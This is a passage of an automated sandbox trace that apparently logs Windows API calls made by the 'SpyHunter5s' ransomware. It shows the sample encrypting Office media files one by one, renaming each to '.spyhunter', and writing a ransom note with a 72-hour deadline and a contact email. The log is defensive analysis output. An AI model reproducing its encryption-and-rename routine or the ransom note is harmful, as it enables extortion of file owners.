Office\\MEDIA\\CAGCAT10\\J0335112.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0335112.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0335112.WMF.spyhunter" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0335112.wmf.spyhunter")) returned 1 [0100.692] GetProcessHeap () returned 0x2c0000 [0100.692] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c961f8 | out: hHeap=0x2c0000) returned 1 [0100.692] GetProcessHeap () returned 0x2c0000 [0100.692] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0100.692] GetProcessHeap () returned 0x2c0000 [0100.692] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c95160 | out: hHeap=0x2c0000) returned 1 [0100.692] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfb88 | out: pbBuffer=0x25cfb88) returned 1 [0100.692] GetProcessHeap () returned 0x2c0000 [0100.692] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0100.692] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25cfb80*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25cfb80*=0x30) returned 1 [0100.692] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0332364.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0332364.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf0 [0100.692] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0332364.WMF") returned 65 [0100.693] StrStrW (lpFirst="J0332364.WMF", lpSrch=".txt") returned 0x0 [0100.693] GetProcessHeap () returned 0x2c0000 [0100.693] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0100.693] ReadFile (in: hFile=0xf0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cfb44, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25cfb44*=0x2800, lpOverlapped=0x0) returned 1 [0100.700] SetFilePointerEx (in: hFile=0xf0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0100.700] WriteFile (in: hFile=0xf0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cfb44, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cfb44*=0x2800, lpOverlapped=0x0) returned 1 [0100.700] GetProcessHeap () returned 0x2c0000 [0100.700] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0100.700] SetFilePointerEx (in: hFile=0xf0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0100.700] WriteFile (in: hFile=0xf0, lpBuffer=0x25cfb84*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cfb44, lpOverlapped=0x0 | out: lpBuffer=0x25cfb84*, lpNumberOfBytesWritten=0x25cfb44*=0x4, lpOverlapped=0x0) returned 1 [0100.716] WriteFile (in: hFile=0xf0, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cfb44, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x25cfb44*=0x30, lpOverlapped=0x0) returned 1 [0100.716] CloseHandle (hObject=0xf0) returned 1 [0100.717] GetProcessHeap () returned 0x2c0000 [0100.717] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c961f8 [0100.717] wnsprintfW (in: pszDest=0x2c961f8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0332364.WMF.spyhunter") returned 75 [0100.717] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0332364.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0332364.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0332364.WMF.spyhunter" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0332364.wmf.spyhunter")) returned 1 [0100.717] GetProcessHeap () returned 0x2c0000 [0100.717] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c961f8 | out: hHeap=0x2c0000) returned 1 [0100.717] GetProcessHeap () returned 0x2c0000 [0100.717] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0100.717] GetProcessHeap () returned 0x2c0000 [0100.717] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c95090 | out: hHeap=0x2c0000) returned 1 [0100.717] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf0 [0100.718] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0100.718] WriteFile (in: hFile=0xf0, lpBuffer=0x25cfab7*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25cfbe0, lpOverlapped=0x0 | out: lpBuffer=0x25cfab7*, lpNumberOfBytesWritten=0x25cfbe0*=0x127, lpOverlapped=0x0) returned 1 [0100.719] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0100.719] WriteFile (in: hFile=0xf0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25cfbe0, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25cfbe0*=0x2ac, lpOverlapped=0x0) returned 1 [0100.719] CloseHandle (hObject=0xf0) returned 1 [0100.719] GetProcessHeap () returned 0x2c0000 [0100.719] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x377e20 | out: hHeap=0x2c0000) returned 1 [0100.720] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfb80 | out: pbBuffer=0x25cfb80) returned 1 [0100.720] GetProcessHeap () returned 0x2c0000 [0100.720] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0100.720] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25cfb78*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25cfb78*=0x30) returned 1 [0100.720] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18257_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18257_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0100.735] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18257_.WMF") returned 74 [0100.735] StrStrW (lpFirst="BD18257_.WMF", lpSrch=".txt") returned 0x0 [0100.735] GetProcessHeap () returned 0x2c0000 [0100.735] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0100.735] ReadFile (in: hFile=0x16c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cfb3c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cfb3c*=0x12ea, lpOverlapped=0x0) returned 1 [0100.776] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xffffed16, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0100.776] WriteFile (in: hFile=0x16c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x12ea, lpNumberOfBytesWritten=0x25cfb3c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cfb3c*=0x12ea, lpOverlapped=0x0) returned 1 [0100.776] GetProcessHeap () returned 0x2c0000 [0100.776] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0100.776] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0100.776] WriteFile (in: hFile=0x16c, lpBuffer=0x25cfb7c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cfb3c, lpOverlapped=0x0 | out: lpBuffer=0x25cfb7c*, lpNumberOfBytesWritten=0x25cfb3c*=0x4, lpOverlapped=0x0) returned 1 [0100.777] WriteFile (in: hFile=0x16c, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cfb3c, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x25cfb3c*=0x30, lpOverlapped=0x0) returned 1 [0100.777] CloseHandle (hObject=0x16c) returned 1 [0100.777] GetProcessHeap () returned 0x2c0000 [0100.777] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c961f8 [0100.777] wnsprintfW (in: pszDest=0x2c961f8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18257_.WMF.spyhunter") returned 84 [0100.777] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18257_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18257_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18257_.WMF.spyhunter" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18257_.wmf.spyhunter")) returned 1 [0100.777] GetProcessHeap () returned 0x2c0000 [0100.778] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c961f8 | out: hHeap=0x2c0000) returned 1 [0100.778] GetProcessHeap () returned 0x2c0000 [0100.778] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0100.778] GetProcessHeap () returned 0x2c0000 [0100.778] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8470 | out: hHeap=0x2c0000) returned 1 [0100.778] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfb78 | out: pbBuffer=0x25cfb78) returned 1 [0100.778] GetProcessHeap () returned 0x2c0000 [0100.778] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0100.778] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25cfb70*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25cfb70*=0x30) returned 1 [0100.778] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14580_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14580_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0101.044] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14580_.GIF") returned 73 [0101.044] StrStrW (lpFirst="BD14580_.GIF", lpSrch=".txt") returned 0x0 [0101.044] GetProcessHeap () returned 0x2c0000 [0101.044] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0101.044] ReadFile (in: hFile=0xec, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cfb34, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cfb34*=0xb9, lpOverlapped=0x0) returned 1 [0101.046] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffff47, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0101.046] WriteFile (in: hFile=0xec, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0xb9, lpNumberOfBytesWritten=0x25cfb34, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cfb34*=0xb9, lpOverlapped=0x0) returned 1 [0101.046] GetProcessHeap () returned 0x2c0000 [0101.046] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0101.046] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0101.046] WriteFile (in: hFile=0xec, lpBuffer=0x25cfb74*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cfb34, lpOverlapped=0x0 | out: lpBuffer=0x25cfb74*, lpNumberOfBytesWritten=0x25cfb34*=0x4, lpOverlapped=0x0) returned 1 [0101.046] WriteFile (in: hFile=0xec, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cfb34, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x25cfb34*=0x30, lpOverlapped=0x0) returned 1 [0101.047] CloseHandle (hObject=0xec) returned 1 [0101.159] GetProcessHeap () returned 0x2c0000 [0101.159] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ce6360 [0101.160] wnsprintfW (in: pszDest=0x2ce6360, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14580_.GIF.spyhunter") returned 83 [0101.160] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14580_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14580_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14580_.GIF.spyhunter" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14580_.gif.spyhunter")) returned 1 [0101.161] GetProcessHeap () returned 0x2c0000 [0101.161] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ce6360 | out: hHeap=0x2c0000) returned 1 [0101.161] GetProcessHeap () returned 0x2c0000 [0101.161] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0101.161] GetProcessHeap () returned 0x2c0000 [0101.161] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3af5a8 | out: hHeap=0x2c0000) returned 1 [0101.161] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfb78 | out: pbBuffer=0x25cfb78) returned 1 [0101.161] GetProcessHeap () returned 0x2c0000 [0101.161] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0101.161] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25cfb70*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25cfb70*=0x30) returned 1 [0101.161] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21421_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21421_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf0 [0101.162] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21421_.GIF") returned 73 [0101.162] StrStrW (lpFirst="BD21421_.GIF", lpSrch=".txt") returned 0x0 [0101.163] GetProcessHeap () returned 0x2c0000 [0101.163] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0101.166] ReadFile (in: hFile=0xf0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cfb34, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cfb34*=0x11f, lpOverlapped=0x0) returned 1 [0101.167] SetFilePointerEx (in: hFile=0xf0, liDistanceToMove=0xfffffee1, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0101.167] WriteFile (in: hFile=0xf0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x11f, lpNumberOfBytesWritten=0x25cfb34, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cfb34*=0x11f, lpOverlapped=0x0) returned 1 [0101.167] GetProcessHeap () returned 0x2c0000 [0101.167] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0101.167] SetFilePointerEx (in: hFile=0xf0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0101.168] WriteFile (in: hFile=0xf0, lpBuffer=0x25cfb74*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cfb34, lpOverlapped=0x0 | out: lpBuffer=0x25cfb74*, lpNumberOfBytesWritten=0x25cfb34*=0x4, lpOverlapped=0x0) returned 1 [0101.168] WriteFile (in: hFile=0xf0, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cfb34, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x25cfb34*=0x30, lpOverlapped=0x0) returned 1 [0101.168] CloseHandle (hObject=0xf0) returned 1 [0101.168] GetProcessHeap () returned 0x2c0000 [0101.168] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ce6360 [0101.168] wnsprintfW (in: pszDest=0x2ce6360, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21421_.GIF.spyhunter") returned 83 [0101.168] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21421_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21421_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21421_.GIF.spyhunter" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21421_.gif.spyhunter")) returned 1 [0101.169] GetProcessHeap () returned 0x2c0000 [0101.169] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ce6360 | out: hHeap=0x2c0000) returned 1 [0101.169] GetProcessHeap () returned 0x2c0000 [0101.169] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0101.169] GetProcessHeap () returned 0x2c0000 [0101.169] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33b500 | out: hHeap=0x2c0000) returned 1 [0101.169] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfb70 | out: pbBuffer=0x25cfb70) returned 1 [0101.169] GetProcessHeap () returned 0x2c0000 [0101.169] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0101.169] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25cfb68*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25cfb68*=0x30) returned 1 [0101.169] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21400_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21400_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf0 [0101.170] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21400_.GIF") returned 73 [0101.170] StrStrW (lpFirst="BD21400_.GIF", lpSrch=".txt") returned 0x0 [0101.170] GetProcessHeap () returned 0x2c0000 [0101.170] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0101.170] ReadFile (in: hFile=0xf0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cfb2c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cfb2c*=0xe9, lpOverlapped=0x0) returned 1 [0101.171] SetFilePointerEx (in: hFile=0xf0, liDistanceToMove=0xffffff17, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0101.171] WriteFile (in: hFile=0xf0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0xe9, lpNumberOfBytesWritten=0x25cfb2c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cfb2c*=0xe9, lpOverlapped=0x0) returned 1 [0101.171] GetProcessHeap () returned 0x2c0000 [0101.171] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0101.171] SetFilePointerEx (in: hFile=0xf0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0101.171] WriteFile (in: hFile=0xf0, lpBuffer=0x25cfb6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cfb2c, lpOverlapped=0x0 | out: lpBuffer=0x25cfb6c*, lpNumberOfBytesWritten=0x25cfb2c*=0x4, lpOverlapped=0x0) returned 1 [0101.172] WriteFile (in: hFile=0xf0, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cfb2c, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x25cfb2c*=0x30, lpOverlapped=0x0) returned 1 [0101.172] CloseHandle (hObject=0xf0) returned 1 [0101.172] GetProcessHeap () returned 0x2c0000 [0101.172] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ce6360 [0101.172] wnsprintfW (in: pszDest=0x2ce6360, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21400_.GIF.spyhunter") returned 83 [0101.172] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21400_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21400_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21400_.GIF.spyhunter" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21400_.gif.spyhunter")) returned 1 [0102.485] GetProcessHeap () returned 0x2c0000 [0102.485] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ce6360 | out: hHeap=0x2c0000) returned 1 [0102.485] GetProcessHeap () returned 0x2c0000 [0102.485] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0102.485] GetProcessHeap () returned 0x2c0000 [0102.485] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33b420 | out: hHeap=0x2c0000) returned 1 [0102.486] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfb70 | out: pbBuffer=0x25cfb70) returned 1 [0102.486] GetProcessHeap () returned 0x2c0000 [0102.486] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0102.486] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25cfb68*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25cfb68*=0x30) returned 1 [0102.486] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD15185_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd15185_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0102.531] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD15185_.GIF") returned 71 [0102.531] StrStrW (lpFirst="BD15185_.GIF", lpSrch=".txt") returned 0x0 [0102.531] GetProcessHeap () returned 0x2c0000 [0102.531] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0102.531] ReadFile (in: hFile=0x16c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cfb2c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25cfb2c*=0x482, lpOverlapped=0x0) returned 1 [0102.557] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xfffffb7e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0102.557] WriteFile (in: hFile=0x16c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x482, lpNumberOfBytesWritten=0x25cfb2c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25cfb2c*=0x482, lpOverlapped=0x0) returned 1 [0102.557] GetProcessHeap () returned 0x2c0000 [0102.558] HeapFree (in: 